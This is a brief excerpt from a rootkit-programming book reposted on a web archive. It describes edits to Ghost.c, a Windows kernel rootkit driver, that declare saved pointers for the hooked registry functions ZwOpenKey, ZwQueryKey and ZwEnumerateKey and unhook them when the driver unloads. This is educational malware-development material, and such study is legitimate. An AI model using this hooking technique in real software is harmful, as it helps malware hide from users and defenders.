Ghost.c


The file Ghost.c was modified to include registryManager.h, define the storage variables for the hooked functions, unhook the three registry key kernel hooks added in hookManager.c, and call the key data cleanup function.

Here are the additions to the top of Ghost.c:

  #include "registryManager.h" ZWOPENKEY OldZwOpenKey; ZWQUERYKEY OldZwQueryKey; ZWENUMERATEKEY OldZwEnumerateKey; 

And here are the additions to OnUnload:

  UNHOOK( ZwOpenKey, OldZwOpenKey );  UNHOOK( ZwQueryKey, OldZwQueryKey );  UNHOOK( ZwEnumerateKey, OldZwEnumerateKey );  FreeKeyTrackingData(); 




Professional Rootkits
Professional Rootkits (Programmer to Programmer)
ISBN: 0470101547
EAN: 2147483647
Year: 2007
Pages: 229
Authors: Ric Vieler

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net